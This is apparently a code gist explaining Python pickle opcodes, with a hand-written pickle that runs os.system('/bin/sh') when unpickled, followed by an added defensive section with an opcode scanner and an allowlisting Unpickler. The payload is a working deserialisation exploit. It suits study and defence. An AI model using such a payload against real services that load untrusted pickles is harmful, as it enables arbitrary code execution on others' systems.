- c: Read to the newline as the module name, module. Read the next line as the object name, object. Push module.object onto the stack.
- (: Insert a marker object onto the stack. For our purpose, this is paired with t to produce a tuple.
- t: Pop objects off the stack until a ( is popped and create a tuple object containing the objects popped (except for the ( marker itself) in the order they were /pushed/ onto the stack. Push the tuple onto the stack.
- S: Read the string in quotes up to the newline and push it onto the stack.
- R: Pop a tuple and a callable off the stack and call the callable with the tuple as arguments. Push the result onto the stack.
- .: End of the pickle.
Created April 3, 2022 11:17
Python pickle code execution
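```python
# https://checkoway.net/musings/pickle/
import pickle5  # PyPI backport of pickle protocol 5 for Python 3.5-3.7

# Hand-written protocol 0 pickle: c pushes os.system, ( and t build the
# argument tuple ('/bin/sh',), R calls os.system('/bin/sh'), . ends the pickle.
s = """cos
system
(S'/bin/sh'
tR."""

# Unpickling executes the opcodes above, so this call spawns a shell.
pickle5.loads(str.encode(s))
```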
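A defensive counterpart to the payload above, added here as an example and not part of the original gist: it disassembles a pickle with `pickletools.genops` without executing it, and shows an allowlisting `Unpickler` refusing the `c` opcode before anything is called. The names `scan`, `RISKY`, `AllowlistUnpickler` and `safe_loads` are assumptions made for this example.

```python
import io
import pickle
import pickletools

# The payload from this page as bytes; it is never passed to pickle.loads here.
PAGE_PAYLOAD = b"cos\nsystem\n(S'/bin/sh'\ntR."

# Opcodes that import an object or invoke a callable during unpickling.
RISKY = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
         "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def scan(data):
    """Walk the opcode stream without executing it.

    Returns (byte offset, opcode name, argument) for every risky opcode.
    """
    return [(pos, op.name, arg)
            for op, arg, pos in pickletools.genops(data)
            if op.name in RISKY]


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that resolves only globals listed in ALLOWED."""

    # Empty by default: plain containers, strings and numbers need no globals.
    ALLOWED = frozenset()  # e.g. {("collections", "OrderedDict")}

    def find_class(self, module, name):
        # Called for c (GLOBAL) and STACK_GLOBAL before the object is pushed,
        # so a refused name never reaches R (REDUCE).
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    """Drop-in for pickle.loads that enforces the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    for finding in scan(PAGE_PAYLOAD):
        print(finding)
    try:
        safe_loads(PAGE_PAYLOAD)
    except pickle.UnpicklingError as exc:
        print("refused:", exc)
```

The scan is a triage aid only; the allowlist in `find_class` is what enforces the restriction when data is actually loaded.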